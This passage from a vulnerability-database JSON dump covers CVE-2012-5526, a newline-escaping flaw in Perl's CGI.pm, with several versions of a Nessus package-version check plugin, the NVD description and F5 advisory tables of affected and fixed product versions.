affected perl-CGI package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"perl-CGI-3.51-10.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-CGI\");\n}\n", "title": "Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 6, "lastseen": "2019-01-16T20:15:09"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:perl-CGI"], "cvelist": ["CVE-2012-5526"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}}, "hash": "4c924314cbb90d39acd2a98140634359ee19d252f6267376c68a3595503106c4", "hashmap": [{"hash": "87a2a1ee50785ccbe0b1efcc433c1101", "key": "references"}, {"hash": "fdecafbf6ec0ad93e3c0ffd5be6fdde0", "key": "cpe"}, {"hash": "b7cd04f3186966896c3418b319b9cedc", "key": "sourceData"}, {"hash": "de38caaccc231e6a74b77a602b35db95", "key": "modified"}, {"hash": "d1bc6fb76582b66f9ae08987bb75320e", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "99f98fc563764a794a5d08126182521b", "key": "cvelist"}, {"hash": "26769fd423968d45be7383413e2552f1", "key": "cvss"}, {"hash": "d15f270db9ec6a0a4c6e766be0214e5b", "key": "description"}, {"hash": "594208dc69a797a068f0b8b8688d938c", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "bcdfa94b833816dccba2361e0c847368", "key": "href"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "4fadcbb166741cb5e0e1d874f2772fb6", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63043", "id": "FEDORA_2012-18362.NASL", "lastseen": "2018-09-02T00:06:49", "modified": "2015-10-20T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "63043", "published": "2012-11-26T00:00:00", "references": ["http://www.nessus.org/u?b1059841", "https://bugzilla.redhat.com/show_bug.cgi?id=877015"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18362.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63043);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 22:34:53 $\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-18362\");\n\n script_name(english:\"Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/092916.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1059841\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-CGI package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"perl-CGI-3.51-10.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-CGI\");\n}\n", "title": "Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-09-02T00:06:49"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2012-5526"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {}, "hash": "08739fcc5c6dc0ba1a1befba058f17255ed04fef53f06d26931b46a052303aeb", "hashmap": [{"hash": "87a2a1ee50785ccbe0b1efcc433c1101", "key": "references"}, {"hash": "b7cd04f3186966896c3418b319b9cedc", "key": "sourceData"}, {"hash": "de38caaccc231e6a74b77a602b35db95", "key": "modified"}, {"hash": "d1bc6fb76582b66f9ae08987bb75320e", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "99f98fc563764a794a5d08126182521b", "key": "cvelist"}, {"hash": "26769fd423968d45be7383413e2552f1", "key": "cvss"}, {"hash": "d15f270db9ec6a0a4c6e766be0214e5b", "key": "description"}, {"hash": "594208dc69a797a068f0b8b8688d938c", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "bcdfa94b833816dccba2361e0c847368", "key": "href"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "4fadcbb166741cb5e0e1d874f2772fb6", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63043", "id": "FEDORA_2012-18362.NASL", "lastseen": "2016-09-26T17:26:23", "modified": "2015-10-20T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.2", "pluginID": "63043", "published": "2012-11-26T00:00:00", "references": ["http://www.nessus.org/u?b1059841", "https://bugzilla.redhat.com/show_bug.cgi?id=877015"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18362.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63043);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 22:34:53 $\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-18362\");\n\n script_name(english:\"Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/092916.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1059841\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-CGI package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"perl-CGI-3.51-10.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-CGI\");\n}\n", "title": "Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:26:23"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "fdecafbf6ec0ad93e3c0ffd5be6fdde0"}, {"key": "cvelist", "hash": "99f98fc563764a794a5d08126182521b"}, {"key": "cvss", "hash": "26769fd423968d45be7383413e2552f1"}, {"key": "description", "hash": "d15f270db9ec6a0a4c6e766be0214e5b"}, {"key": "href", "hash": "bcdfa94b833816dccba2361e0c847368"}, {"key": "modified", "hash": "460b12446c99e9f96de9e7fe92f5d167"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "4fadcbb166741cb5e0e1d874f2772fb6"}, {"key": "published", "hash": "594208dc69a797a068f0b8b8688d938c"}, {"key": "references", "hash": "87a2a1ee50785ccbe0b1efcc433c1101"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "732c700bd9eb065302f4eef5ddfc0be0"}, {"key": "title", "hash": "d1bc6fb76582b66f9ae08987bb75320e"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "e22dc4d59a507eeafa2e2dbb80543a9b2fce820f11323eb967de8f986ba86f41", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-5526"]}, {"type": "f5", "idList": ["F5:K15867", "SOL15867"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310831757", "OPENVAS:1361412562310864899", "OPENVAS:864929", "OPENVAS:803344", "OPENVAS:892587", "OPENVAS:1361412562310864933", "OPENVAS:1361412562310892587", "OPENVAS:803160", "OPENVAS:1361412562310803344", "OPENVAS:1361412562310864929"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2587-1:C94C7", "DEBIAN:DSA-2586-1:65FFB"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2587.NASL", "FEDORA_2012-18318.NASL", "FEDORA_2012-19282.NASL", "MANDRIVA_MDVSA-2012-180.NASL", "FEDORA_2012-18330.NASL", "FEDORA_2012-19125.NASL", "DEBIAN_DSA-2586.NASL", "SOLARIS11_PERL-512_20131017.NASL", "OPENSUSE-2013-225.NASL", "SUSE_PERL-8479.NASL"]}, {"type": "aix", "idList": ["PERL_ADVISORY3.ASC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0497-1", "OPENSUSE-SU-2013:0502-1", "SUSE-SU-2013:0441-1", "SUSE-SU-2013:0442-1"]}, {"type": "centos", "idList": ["CESA-2013:0685"]}, {"type": "redhat", "idList": ["RHSA-2013:0685", "RHSA-2013:0746"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/TWIKI_MAKETEXT"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0685"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12731", "SECURITYVULNS:DOC:28787"]}, {"type": "ubuntu", "idList": ["USN-1643-1"]}, {"type": "amazon", "idList": ["ALAS-2013-177"]}], "modified": "2019-02-21T01:18:00"}, "score": {"value": 2.1, "vector": "NONE"}, "vulnersScore": 2.1}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18362.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63043);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/28 22:47:44\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-18362\");\n\n script_name(english:\"Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/092916.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1059841\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-CGI package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"perl-CGI-3.51-10.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-CGI\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "63043", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:perl-CGI"], "scheme": null}
{"cve": [{"lastseen": "2017-08-29T12:17:51", "bulletinFamily": "NVD", "description": "CGI.pm module before 3.63 for Perl does not properly escape newlines in (1) Set-Cookie or (2) P3P headers, which might allow remote attackers to inject arbitrary headers into responses from applications that use CGI.pm.", "modified": "2017-08-28T21:32:42", "published": "2012-11-21T18:55:02", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5526", "id": "CVE-2012-5526", "title": "CVE-2012-5526", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "f5": [{"lastseen": "2019-04-30T18:21:05", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 416734 (BIG-IP), ID 474513 (BIG-IQ), and ID 474518 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP AAM| 11.4.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP AFM| 11.3.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Analytics| 11.0.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP APM| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP ASM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Perl binary and library \nBIG-IP GTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Link Controller| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP PEM| 11.3.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| None| Perl binary and library \nBIG-IP DNS| None| 12.0.0 - 12.1.2| None \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Perl binary and library \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Perl binary and library \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None| Perl binary and library \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Perl binary and library \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Perl binary and library \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Perl binary and library \nBIG-IQ ADC| 4.5.0| None| Perl binary and library \nBIG-IQ Centralized Management| 5.0.0 - 5.1.0 \n4.6.0| None| Perl binary and library \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Perl binary and library \nF5 iWorkflow| 2.0.0 - 2.0.2| 2.1.0| Perl binary and library\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability, you should permit access to the system over a secure network and limit command line access to trusted users. For more information about securing access to the system, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-04-26T22:14:00", "published": "2014-11-25T21:29:00", "id": "F5:K15867", "href": "https://support.f5.com/csp/article/K15867", "title": "Perl vulnerabilities CVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:18", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the system over a secure network and limit command line access to trusted users. For more information about securing access to the system, refer to SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-09-01T00:00:00", "published": "2014-11-25T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15867.html", "id": "SOL15867", "title": "SOL15867 - Perl vulnerabilities CVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:18:02", 